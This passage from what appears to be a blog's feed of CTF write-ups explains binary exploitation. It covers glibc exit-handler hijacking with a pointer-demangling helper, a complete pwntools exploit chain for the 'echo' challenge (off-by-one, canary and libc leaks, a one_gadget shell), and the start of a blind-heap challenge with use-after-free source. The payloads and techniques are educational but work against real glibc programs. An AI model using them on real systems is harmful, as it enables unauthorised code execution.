Looking at the code below, we can see that an &lt;code&gt;exit_function&lt;/code&gt; is a &lt;strong&gt;struct&lt;/strong&gt; that &lt;strong&gt;wraps a function call&lt;/strong&gt;. The &lt;code&gt;flavor&lt;/code&gt; field indicates that there are multiple types of exit functions that take different combinations of arguments.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals
struct exit_function
  {
    long int flavor;
    union
    {
		void (*at) (void);
		struct
		{
		    void (*fn) (int status, void *arg);
		    void *arg;
		} on;
		struct
		{
		    void (*fn) (void *arg, int status);
		    void *arg;
		    void *dso_handle;
		} cxa;
    } func;
  };
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looking at the &lt;code&gt;__run_exit_handlers()&lt;/code&gt; snippet below, we can see how the flavor changes the way an exit function is called:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;ef_free&lt;/strong&gt;: slot is dead, ignore&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ef_us&lt;/strong&gt;: nothing happens&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ef_on&lt;/strong&gt;: status code as first argument and user supplied argument as second one&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ef_at&lt;/strong&gt;: function without arguments&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ef_cxa&lt;/strong&gt;: the important one, &lt;strong&gt;first argument is user supplied&lt;/strong&gt; and second one is the status code.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;:::note
In current glibc, the &lt;code&gt;atexit()&lt;/code&gt; call from the example above is itself implemented on top of &lt;code&gt;__cxa_atexit()&lt;/code&gt;, so it registers &lt;strong&gt;ef_cxa&lt;/strong&gt; entries with a null argument. If you want to register &lt;strong&gt;ef_on&lt;/strong&gt; functions, there is a GNU extension called &lt;code&gt;on_exit()&lt;/code&gt;.
:::
&lt;strong&gt;Question:&lt;/strong&gt; Why is &lt;code&gt;ef_cxa&lt;/code&gt; the best flavor?&lt;br /&gt;
&lt;strong&gt;Answer:&lt;/strong&gt; We can overwrite the function pointer with &lt;code&gt;system()&lt;/code&gt; and set the first argument to a pointer to &lt;code&gt;/bin/sh&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals
__run_exit_handlers (int status, struct exit_function_list **listp,
			bool run_list_atexit, bool run_dtors)
{

...

while (cur-&amp;gt;idx &amp;gt; 0)
	{
	struct exit_function *const f = &amp;amp;cur-&amp;gt;fns[--cur-&amp;gt;idx];
	const uint64_t new_exitfn_called = __new_exitfn_called;
	
	__libc_lock_unlock (__exit_funcs_lock);
	switch (f-&amp;gt;flavor)
	{
		void (*atfct) (void);
		void (*onfct) (int status, void *arg);
		void (*cxafct) (void *arg, int status);
		
		case ef_free:
		case ef_us:
			break;
	    case ef_on:
			onfct = f-&amp;gt;func.on.fn;
			onfct (status, f-&amp;gt;func.on.arg);
			break;
	    case ef_at:
			atfct = f-&amp;gt;func.at;
			atfct ();
			break;
	    case ef_cxa:
			f-&amp;gt;flavor = ef_free;
			cxafct = f-&amp;gt;func.cxa.fn;
			cxafct (f-&amp;gt;func.cxa.arg, status); // &amp;lt;-- cxa is executed here 
			break;
	}
	  __libc_lock_lock (__exit_funcs_lock);
	  if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
	    goto restart;
	}

...

}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Putting it all together&lt;/h3&gt;
&lt;p&gt;In practice, we are going to inspect the &lt;strong&gt;exit handler array entries&lt;/strong&gt;, look for an exit handler with &lt;code&gt;flavor == 4 (ef_cxa)&lt;/code&gt; to overwrite with a pointer to &lt;code&gt;system()&lt;/code&gt;, and then set &lt;code&gt;/bin/sh&lt;/code&gt; as its first argument. Getting a shell from there is as easy as executing the binary and exiting.&lt;/p&gt;
&lt;h4&gt;Step 1: Getting the __exit_funcs struct&lt;/h4&gt;
&lt;p&gt;Using our &lt;em&gt;libc leak&lt;/em&gt; obtained before, we locate the exit function list by adding its offset to the libc base address. In libc, &lt;code&gt;__exit_funcs&lt;/code&gt; initially points to a statically allocated list named &lt;code&gt;initial&lt;/code&gt;. Further lists are only allocated when more exit functions get registered than fit into it, so &lt;code&gt;initial&lt;/code&gt; is the one that always exists:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;__exit_funcs = libc_base + libc.symbols.initial
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We then overwrite the first &lt;strong&gt;tcache forward pointer&lt;/strong&gt; with this address. Remember that when malloc is called the first 16 bytes get zeroed out.
After calling &lt;code&gt;malloc()&lt;/code&gt; twice, the second call returns a pointer to the &lt;code&gt;initial&lt;/code&gt; struct, which we can now read and edit.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pwndbg&amp;gt; tele 0x7f3046204fc0 &amp;lt;-- libc_base + initial offset
00:0000│  0x7f3046204fc0 (initial) ◂— 0
01:0008│  0x7f3046204fc8 (initial+8) ◂— 1 &amp;lt;-- number of registered funcs
02:0010│  0x7f3046204fd0 (initial+16) ◂— 4 &amp;lt;-- flavor
03:0018│  0x7f3046204fd8 (initial+24) ◂— 0x91b97d6d433887e0 &amp;lt;-- function addrs
04:0020│  0x7f3046204fe0 (initial+32) ◂— 0 &amp;lt;-- argument
... ↓     3 skipped
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looking at the output from pwndbg above, we notice only one entry in the array. Fortunately it is an &lt;code&gt;ef_cxa&lt;/code&gt; entry, so we only need to replace its function pointer with &lt;code&gt;system()&lt;/code&gt;.&lt;/p&gt;
&lt;h4&gt;Step 2: Replacing function with system()&lt;/h4&gt;
&lt;p&gt;Do you notice something wrong with the function address in the snippet above? That&apos;s &lt;strong&gt;not&lt;/strong&gt; an address. When an exit function gets registered, its address is XORed with a key called &lt;strong&gt;pointer_chk_guard&lt;/strong&gt; and then rotated left by 17 bits (0x11).&lt;br /&gt;
$$
\text{mangled_address} = \texttt{rol}(\text{address} \oplus\ \text{key} , \text{0x11})
$$
$$
\text{address} = \texttt{ror}(\text{mangled_address}, \text{0x11})\ \oplus\ \text{key}
$$
If we know the real address of a registered function, we can recover the key: perform a &lt;code&gt;ROR&lt;/code&gt; (rotate right) by 0x11 bits on the mangled address and then &lt;code&gt;XOR&lt;/code&gt; the result with the real address.
$$
\text{key} = \texttt{ror}(\text{mangled_address}, \text{0x11})\ \oplus \ \text{address}
$$
Once we have the key, we can replace the old mangled function address with the mangled &lt;code&gt;system()&lt;/code&gt; address and replace the argument &lt;code&gt;0&lt;/code&gt; with a pointer to a &lt;code&gt;/bin/sh\0&lt;/code&gt; string.&lt;/p&gt;
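&lt;p&gt;The three formulas translate almost one to one into Python. The following is a minimal sketch for 64 bit values; the helper names and both placeholder addresses are invented for illustration, only the mangled value is the one from the pwndbg dump.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MASK64 = (1 &amp;lt;&amp;lt; 64) - 1


def rol(value, bits):
    # 64 bit rotate left
    return ((value &amp;lt;&amp;lt; bits) | (value &amp;gt;&amp;gt; (64 - bits))) &amp;amp; MASK64


def ror(value, bits):
    # 64 bit rotate right
    return ((value &amp;gt;&amp;gt; bits) | (value &amp;lt;&amp;lt; (64 - bits))) &amp;amp; MASK64


def mangle(address, key):
    return rol(address ^ key, 0x11)


def demangle(mangled, key):
    return ror(mangled, 0x11) ^ key


def recover_key(mangled, address):
    return ror(mangled, 0x11) ^ address


mangled = 0x91b97d6d433887e0     # value seen at initial+24 in the dump
known_address = 0x7f3046431000   # placeholder, NOT the real handler address
system_address = 0x7f3046058000  # placeholder, NOT the real system() address

key = recover_key(mangled, known_address)
assert demangle(mangled, key) == known_address
new_entry = mangle(system_address, key)  # value to write back at initial+24
assert demangle(new_entry, key) == system_address
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With the real addresses plugged in, &lt;code&gt;new_entry&lt;/code&gt; is the value that replaces the old mangled pointer.&lt;/p&gt;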
&lt;p&gt;But how do we get the unmangled address to recover the key?&lt;br /&gt;
Set a breakpoint at &lt;code&gt;exit()&lt;/code&gt; and let the program hit it, then step until you find the &lt;code&gt;ROR&lt;/code&gt; and &lt;code&gt;XOR&lt;/code&gt; instructions. Once the runtime has demangled the function pointer, you can read the real address from the register.
Unfortunately, in our case the registered function&apos;s address is &lt;strong&gt;not&lt;/strong&gt; relative to &lt;code&gt;libc&lt;/code&gt; but to the dynamic loader (&lt;code&gt;ld&lt;/code&gt;). Fortunately, &lt;code&gt;libc&lt;/code&gt; contains pointers into the loader mapping, so you can find those with &lt;code&gt;p2p libc ld&lt;/code&gt; and use them to resolve the loader base.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-018.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Using the same tcache poisoning technique we applied to read and modify the exit function array, we can also leak the loader’s address.&lt;br /&gt;
We’ll use the last pointer in the output from &lt;code&gt;p2p&lt;/code&gt;: the allocation writes into the returned chunk before we can read from it, so the pointer we leak must sit in writable memory.&lt;br /&gt;
Once again, we overwrite the first tcache chunk’s forward pointer with this address, allocate two chunks, and then read from the second one to obtain the loader leak.&lt;/p&gt;
&lt;p&gt;:::note
The &lt;strong&gt;pointer_chk_guard&lt;/strong&gt; is an element of the &lt;strong&gt;Thread Control Block&lt;/strong&gt; (TCB) stored inside the &lt;strong&gt;Thread Local Storage&lt;/strong&gt; (TLS). TLS is a per-thread storage area whose address is kept in a dedicated register (&lt;code&gt;fs&lt;/code&gt; on x86-64). Its position is randomized and very difficult to leak.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-001.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The first non-address value you see is our &lt;strong&gt;canary&lt;/strong&gt; (&lt;code&gt;stack_chk_guard&lt;/code&gt;), recognizable by the zero byte at the end. The value stored directly after it is our &lt;strong&gt;key&lt;/strong&gt; (&lt;code&gt;pointer_chk_guard&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;But &lt;code&gt;pointer_chk_guard&lt;/code&gt; is derived from somewhere else:&lt;/p&gt;
&lt;p&gt;When the kernel loads an executable through &lt;code&gt;execve&lt;/code&gt;, it writes a key-value structure called the &lt;strong&gt;Auxiliary Vector&lt;/strong&gt; (auxv) into the new process&apos;s memory. Many critical values are stored there; you can print them by setting the &lt;code&gt;LD_SHOW_AUXV=1&lt;/code&gt; environment variable.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;❯ LD_SHOW_AUXV=1 gdb
AT_SYSINFO_EHDR:      0x7fba40212000
AT_MINSIGSTKSZ:       3376
AT_HWCAP:             0x178bfbff
AT_PAGESZ:            4096
AT_CLKTCK:            100
AT_PHDR:              0x562b9823f040
AT_PHENT:             56
AT_PHNUM:             15
AT_BASE:              0x7fba40214000
AT_FLAGS:             0x0
AT_ENTRY:             0x562b982f3ac0
AT_UID:               1000
AT_EUID:              1000
AT_GID:               1000
AT_EGID:              1000
AT_SECURE:            0
AT_RANDOM:            0x7ffee4809839
AT_HWCAP2:            0x2
AT_EXECFN:            /usr/bin/gdb
AT_PLATFORM:          x86_64
AT_RSEQ_FEATURE_SIZE: 28
AT_RSEQ_ALIGN:        32
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looking at the &lt;code&gt;AT_RANDOM&lt;/code&gt; entry, we see that it points to the stack. At initialization the kernel copies 16 random bytes onto the stack: the first 8 bytes become our canary, the second 8 bytes become our &lt;strong&gt;pointer_chk_guard&lt;/strong&gt;.
But why are the values copied into the TCB if they are saved on the stack too? Because every thread needs to access these values.
:::&lt;/p&gt;
&lt;h4&gt;Step 3: exiting gracefully&lt;/h4&gt;
&lt;p&gt;Now we have everything we need to recover the key. After overwriting the struct with the mangled &lt;code&gt;system()&lt;/code&gt; address and a pointer to &lt;code&gt;/bin/sh&lt;/code&gt; as argument, we simply need to let the program exit to get a shell.&lt;/p&gt;
&lt;p&gt;Still have questions about &lt;code&gt;__exit_funcs&lt;/code&gt;? Here is a link to a nice &lt;a href=&quot;https://binholic.blogspot.com/2017/05/notes-on-abusing-exit-handlers.html&quot;&gt;blogpost&lt;/a&gt;.&lt;/p&gt;
</content:encoded><author>David Hermes</author></item><item><title>echo: Srdnlen Quals 2026</title><link>https://blog.davidherm.es/posts/echo</link><guid isPermaLink="true">https://blog.davidherm.es/posts/echo</guid><description>Interesting off by one ctf challenge.</description><pubDate>Tue, 03 Feb 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;What can you do with a single overflowing byte? Well... first let&apos;s look at the security mitigations.
You&apos;ll notice that this is a completely locked-down binary, but that won&apos;t stop us.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/index-001.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Disassembly&lt;/h2&gt;
&lt;p&gt;There are three important functions in this binary:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;main()&lt;/code&gt;: simply calls our echo function.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;echo()&lt;/code&gt;:  internally calls &lt;code&gt;read_stdin()&lt;/code&gt; and prints the read text on stdout.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;read_stdin()&lt;/code&gt;: a strange wrapper around the standard &lt;code&gt;read()&lt;/code&gt; function.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;code&gt;main&lt;/code&gt; function isn&apos;t that significant, so we can skip it for brevity and focus directly on &lt;code&gt;echo()&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;unsigned __int64 echo()
{
  char buffer[64]; // [rsp+0h] [rbp-50h] BYREF
  unsigned __int8 max_chars; // [rsp+40h] [rbp-10h]
  unsigned __int64 canary; // [rsp+48h] [rbp-8h]

  canary = __readfsqword(0x28u);
  memset(buffer, 0, sizeof(buffer));
  max_chars = 64;
  while ( 1 )
  {
    printf(&quot;echo &quot;);
    read_stdin(buffer, max_chars);
    if ( !buffer[0] )
      break;
    puts(buffer);
  }
  return canary - __readfsqword(0x28u);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This function does exactly what the name implies: it &lt;em&gt;requests&lt;/em&gt; max 64 bytes from stdin and sends it back to stdout through &lt;code&gt;puts(buffer)&lt;/code&gt;. There doesn&apos;t seem to be an overflow here without looking into &lt;code&gt;read_stdin()&lt;/code&gt;. Also, that stack canary will definitely be a problem later.&lt;/p&gt;
&lt;p&gt;Interestingly, the &lt;code&gt;max_chars&lt;/code&gt; variable is declared at the start of the function and stored on the stack. Technically it isn&apos;t needed: the developer could have simply passed the constant to &lt;code&gt;read_stdin()&lt;/code&gt; directly.&lt;/p&gt;
&lt;p&gt;Now let&apos;s explore the &lt;code&gt;read_stdin()&lt;/code&gt; function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char *__fastcall read_stdin(char *buffer, unsigned __int8 max_chars)
{
  char *char_ptr; // rax
  unsigned __int8 i; // [rsp+1Fh] [rbp-1h]

  for ( i = 0; i &amp;lt;= max_chars; ++i )
  {
    if ( read(0, &amp;amp;buffer[i], 1uLL) != 1 || buffer[i] == &apos;\n&apos; )
    {
      char_ptr = &amp;amp;buffer[i];
      *char_ptr = 0;
      return char_ptr;
    }
  }
  return char_ptr;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This function behaves a little strangely: it iterates up to &lt;code&gt;max_chars + 1&lt;/code&gt; times, reading one byte per iteration. If the byte is a newline, or if &lt;code&gt;read()&lt;/code&gt; does not return a byte, that position is overwritten with a null byte (&lt;code&gt;\x00&lt;/code&gt;) and the function returns.&lt;/p&gt;
&lt;p&gt;So think about this scenario: &lt;code&gt;max_chars&lt;/code&gt; is set to 64, but the loop lets us read up to 65 bytes (&lt;code&gt;i &amp;lt;= max_chars&lt;/code&gt;). If we send exactly 65 &lt;code&gt;A&lt;/code&gt;s without a newline, we write one byte outside the bounds of the buffer without even writing a nullbyte.&lt;/p&gt;
&lt;p&gt;But where exactly does the OOB byte land?&lt;/p&gt;
&lt;h2&gt;One byte to rule them all&lt;/h2&gt;
&lt;p&gt;Looking at the &lt;code&gt;echo()&lt;/code&gt; function we see that the &lt;code&gt;max_chars&lt;/code&gt; variable is placed directly after our buffer on the stack. This is great! With a single byte it is possible to overwrite &lt;code&gt;max_chars&lt;/code&gt; with something like &lt;code&gt;0xFF&lt;/code&gt; and get a big buffer overflow.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[rbp-0x50] buffer (64 bytes)  &amp;lt;-- Fills with &quot;A&quot;*64 
[rbp-0x10] max_chars (1 byte) &amp;lt;-- Can be overwritten by &quot;\xFF&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, we need to choose &lt;code&gt;max_chars&lt;/code&gt; precisely! Its value must be exactly the number of bytes we want to write next minus one; otherwise a null byte is appended at the end, which could break our exploit.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r.sa(b&quot;echo &quot;, b&quot;A&quot;*64 + b&quot;\x48&quot;)
&lt;/code&gt;&lt;/pre&gt;
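&lt;p&gt;Since every payload has to announce the length of the one that follows it, a tiny helper keeps the bookkeeping straight. This is a sketch with a made-up name (&lt;code&gt;build_stage&lt;/code&gt;); it relies on my reading of the decompiled code that &lt;code&gt;max_chars&lt;/code&gt; is passed by value, so an overwritten value only takes effect on the next call to &lt;code&gt;read_stdin()&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;BUF_LEN = 64  # sizeof(buffer) in echo()


def build_stage(next_len, tail=b&quot;&quot;):
    # next_len: total length of the payload we want to send in the NEXT round.
    # tail:     bytes of THIS payload that land after max_chars.
    if not 1 &amp;lt;= next_len &amp;lt;= 0x100:
        raise ValueError(&quot;max_chars is a single byte&quot;)
    return b&quot;A&quot; * BUF_LEN + bytes([next_len - 1]) + tail


first = build_stage(0x49)                    # same bytes as the payload above
second = build_stage(0x78, b&quot;B&quot; * 7 + b&quot;Z&quot;)  # 0x49 bytes, announces 0x78 more
assert len(second) == 0x49
&lt;/code&gt;&lt;/pre&gt;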
&lt;p&gt;Yet we still have a little hurdle to overcome to get to a return address overwrite: the stack canary.&lt;/p&gt;
&lt;h2&gt;One byte to leak them&lt;/h2&gt;
&lt;p&gt;Stack canaries have a nice property (or not, depending on the situation): the first byte in memory is always a null byte. On one hand, this stops us from leaking the canary with a simple print function, because the null byte acts as a string terminator. On the other hand, we can overwrite that byte without losing any information about the canary.&lt;/p&gt;
&lt;p&gt;By overflowing the buffer up to and including the first byte of the canary, the separation between our string and the canary bytes is lost. &lt;code&gt;puts()&lt;/code&gt; will therefore continue printing until it reaches a null byte, which conveniently also leaks the saved RBP.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r.sa(b&quot;echo &quot;, b&quot;A&quot;*64 + b&quot;\x77&quot; + b&quot;B&quot;*7 + b&quot;Z&quot;) #0x49 bytes, max_chars must be \x48
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;[rbp-0x50] buffer (64 bytes)  &amp;lt;-- Fills with &quot;A&quot;*64
[rbp-0x10] max_chars (1 byte) &amp;lt;-- Overwritten by &quot;\x77&quot; (expands loop) 
[rbp-0x0F] padding (7 bytes)  &amp;lt;-- Fills with &quot;B&quot;*7 
[rbp-0x08] canary (8 bytes)   &amp;lt;-- LSB overwritten by &quot;Z&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will get us:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;AAAAA...AAAOBBBBBBBZO\x93;\x11Q_|\xb0\x84D\x80\xfe\x7f
                   |    canary    | Saved Base Pointer |
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can use the &lt;code&gt;Z&lt;/code&gt; character as a delimiter to slice the output (this is why we added it), parse the leaked bytes, and reconstruct the canary and the saved RBP.&lt;/p&gt;
&lt;p&gt;:::note
Remember that the leaked canary is only 7 bytes long; the leading null byte must be prepended before unpacking the value with &lt;code&gt;u64(canary_leak)&lt;/code&gt;.
:::&lt;/p&gt;
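&lt;p&gt;The slicing described above can be sketched with the standard library only. This is a minimal sketch, not the original exploit code: &lt;code&gt;parse_leak&lt;/code&gt; is a hypothetical helper, and it assumes that neither the byte written into &lt;code&gt;max_chars&lt;/code&gt; nor the padding is a &lt;code&gt;Z&lt;/code&gt;, and that the leaked canary and the six low bytes of the saved RBP contain no null byte.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def parse_leak(output):
    # Keep only what follows the first 'Z' delimiter
    tail = output.split(b'Z', 1)[1]
    # 7 leaked canary bytes; the overwritten lowest byte is restored as 0x00
    canary = int.from_bytes(b'\x00' + tail[:7], 'little')
    # puts() stops at the first null byte, so only 6 bytes of the saved RBP arrive
    saved_rbp = int.from_bytes(tail[7:13], 'little')
    return canary, saved_rbp
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With pwntools the same result comes from &lt;code&gt;u64()&lt;/code&gt; after padding each slice to 8 bytes; &lt;code&gt;int.from_bytes&lt;/code&gt; just avoids the manual padding.&lt;/p&gt;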
&lt;p&gt;We are finally ready to overwrite the saved return pointer. But what do we point it to? We need one more leak... a pointer to Libc.&lt;/p&gt;
&lt;h3&gt;Getting a Libc pointer&lt;/h3&gt;
&lt;p&gt;Remember that &lt;code&gt;main()&lt;/code&gt; is not truly the entry point of a C program. If you look at the stack with a debugger right after &lt;code&gt;main()&lt;/code&gt; is called, you will see at the top of the stack a return address pointing into a function called &lt;code&gt;__libc_start_call_main&lt;/code&gt;. As the name suggests, this function lives in the standard library.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;00:0000│ rsp 0x7ffc0c2e3678 —▸ 0x7fc4ede2a1ca ◂— mov edi, eax #__libc_start_call_main + ???
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can leak this address exactly like we leaked the other address:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r.sa(b&quot;echo &quot;, b&quot;A&quot;*64 + b&quot;\x5f&quot; + b&quot;b&quot;*7 + b&quot;B&quot;*0x28 + b&quot;C&quot;*7 + b&quot;Z&quot;) #0x78 bytes, max_char must be \x77
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;[rbp-0x50] buffer (64 bytes)   &amp;lt;-- Fills with &quot;A&quot;*64
[rbp-0x10] max_chars (1 byte)  &amp;lt;-- Overwritten by &quot;\x5f&quot;
[rbp-0x0F] padding (7 bytes)   &amp;lt;-- Fills with &quot;b&quot;*7 
[rbp-0x08] canary (8 bytes)    &amp;lt;-- Fills with &quot;B&quot;s
[rbp-0x00] saved RBP (8 bytes) &amp;lt;-- Fills with &quot;B&quot;s
[rbp+0x08] saved RIP (8 bytes) &amp;lt;-- Fills with &quot;B&quot;s
[rbp+0x10] *argv (8 bytes)     &amp;lt;-- Fills with &quot;B&quot;s
[rbp+0x18] argc (4 bytes)      &amp;lt;-- Fills with &quot;B&quot;s
[rbp+0x1c] padding (4 bytes)   &amp;lt;-- Fills with &quot;B&quot;s
[rbp+0x20] saved RBP (8 bytes) &amp;lt;-- Fills with 7 &quot;C&quot;s and one &quot;Z&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;One byte to bring them all&lt;/h2&gt;
&lt;p&gt;Now we have everything we need. Here is the final exploitation path: We overflow the buffer all the way down to the return address. Along the way, we carefully replace the canary and the base pointer with the values we leaked earlier, acting as if nothing ever happened so the canary check succeeds. Finally, we overwrite the return address to redirect execution to a &lt;code&gt;one_gadget&lt;/code&gt; in Libc to get a shell.&lt;/p&gt;
&lt;h3&gt;Finding the right Libc version&lt;/h3&gt;
&lt;p&gt;To find the correct libc version on the remote server, &lt;a href=&quot;https://libc.blukat.me/?&quot;&gt;libc.blukat.me&lt;/a&gt; is our best friend. We can enter our leaked libc address together with its symbol name to find all libc versions that match that offset.
But which symbol should we query for? The function&apos;s name is &lt;code&gt;__libc_start_call_main&lt;/code&gt;, but the leak points somewhere in the middle of it. Fortunately, we can use &lt;code&gt;__libc_start_main_ret&lt;/code&gt; for exactly this scenario.&lt;/p&gt;
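&lt;p&gt;Once a candidate libc is picked, the base address follows from a single subtraction. Here is a small sketch of that step: &lt;code&gt;libc_base&lt;/code&gt; is a hypothetical helper, and the offset used in the usage note is an assumption chosen only to match the sample address from the debugger output above. The real offset must come from the matched database entry.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PAGE = 0x1000

def libc_base(leak, ret_offset):
    # Subtract the offset of __libc_start_main_ret inside the candidate libc
    base = leak - ret_offset
    # A correct base is page aligned; anything else means the wrong libc was picked
    if base % PAGE != 0:
        raise ValueError('base is not page aligned, wrong libc version?')
    return base
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For example, &lt;code&gt;libc_base(0x7fc4ede2a1ca, 0x2a1ca)&lt;/code&gt; gives &lt;code&gt;0x7fc4ede00000&lt;/code&gt;. The alignment check is a cheap sanity test: ASLR never changes the lowest 12 bits of an address, which is also why those bits are enough to identify the libc.&lt;/p&gt;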
&lt;p&gt;&lt;img src=&quot;./images/index-001-1.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;It is often helpful to download the newest matching version first and, if it doesn&apos;t work, try the older ones. By running the &lt;code&gt;one_gadget&lt;/code&gt; utility from your shell (or directly inside pwndbg), we can find a working gadget.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/index-002.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Now we can send the last echo command!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r.sa(b&quot;echo &quot;, b&quot;\0&quot;*72 + p64(canary_l) + p64(stack_l + 0x8) + p64(libc_l + 0xef52b))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;:::note
When you have a buffer overflow and control the RBP, you can often make &quot;unusable&quot; &lt;code&gt;one_gadgets&lt;/code&gt; viable. For example, the gadget in this exploit requires &lt;code&gt;[rbp-0x78] == NULL&lt;/code&gt;. By intentionally moving the RBP and padding our overflow with null bytes, we satisfy the gadget&apos;s constraints and successfully trigger a shell!
:::&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[rbp-0x50] buffer + others (72 bytes)   &amp;lt;-- Fills with &quot;\0&quot;
[rbp-0x08] canary (8 bytes)             &amp;lt;-- Fills with real canary
[rbp-0x00] saved RBP (8 bytes)          &amp;lt;-- Fills with stack_l + 0x8
[rbp+0x08] saved RIP (8 bytes)          &amp;lt;-- Fills with Onegadget
&lt;/code&gt;&lt;/pre&gt;
</content:encoded><author>David Hermes</author></item><item><title>House of Fish: TRX CTF 2026</title><link>https://blog.davidherm.es/posts/hof</link><guid isPermaLink="true">https://blog.davidherm.es/posts/hof</guid><description>Writeup of a blind heap challenge through large bin attack and smallbin stash unlink attack.</description><pubDate>Mon, 27 Apr 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;This past weekend, my team and I participated in the TRX 2026 CTF. It was one of the most difficult CTFs this year (so far, at least). Sadly, I skill-issued my way to the end of the 48 hour competition with zero solves.
Luckily, my teammates were much more locked in and solved a bunch of challenges. I only managed to solve this blind heap challenge the day after the event ended, but it incorporates some cool techniques that I want to document for myself and for you. Let&apos;s start with the code.&lt;/p&gt;
&lt;h2&gt;chall.c&lt;/h2&gt;
&lt;p&gt;I wrote some comments inside the code snippets to make them a little easier to understand. Also notice the complete absence of a function that prints chunk contents back to us: as I said before, this is a blind heap challenge, so no leaks.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void create() {
	unsigned int idx;
	unsigned int size;
	void* ptr;
	
	idx = get_idx();   // max 0x100 slots, more than enough...
	size = get_size(); // max 0x500 bytes (gets rounded to the next multiple of 16!!!)
	
	ptr = malloc(size);
	printf(&quot;allocated size: %d\n&quot;, size);
	
	ptrs[idx] = ptr;
	sizes[idx] = size;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;void update() {
	unsigned int idx;
	
	idx = get_idx();
	
	printf(&quot;enter %d bytes: &quot;, sizes[idx]);
	// this function expects exactly sizes[idx] bytes, no more no less. 
	read_exactly(STDIN_FILENO, ptrs[idx], sizes[idx]);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;void delete() {
	unsigned int idx;
	
	idx = get_idx();
	free(ptrs[idx]); //use after free vulnerability!
}	
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;void copy() {
	unsigned int dest;
	unsigned int src;
	
	dest = get_idx(); 
	src = get_idx();
	
	// because of the rounding in create() it is not possible to copy 0x8 bytes, only multiples of 16.
	
	memcpy(ptrs[dest], ptrs[src], min(sizes[dest], sizes[src]));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;//This is one of the menu options, so we only need to write that 8-byte value into *admin
void win() {
	if (*admin == 0xdeadbeefdeadcafe) {
		puts(&quot;good boy&quot;);
		system(&quot;/bin/sh&quot;);
	} else 
		die(&quot;admin&quot;);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Did you notice the &lt;code&gt;admin&lt;/code&gt; variable? It holds a pointer to a mapped memory area at a fixed address.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;admin = (unsigned long*) mmap((void*) 0x1337000, 8, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is very important because it is the only pointer we know of in the entire binary. Looking at the checksec output confirms this.&lt;/p&gt;
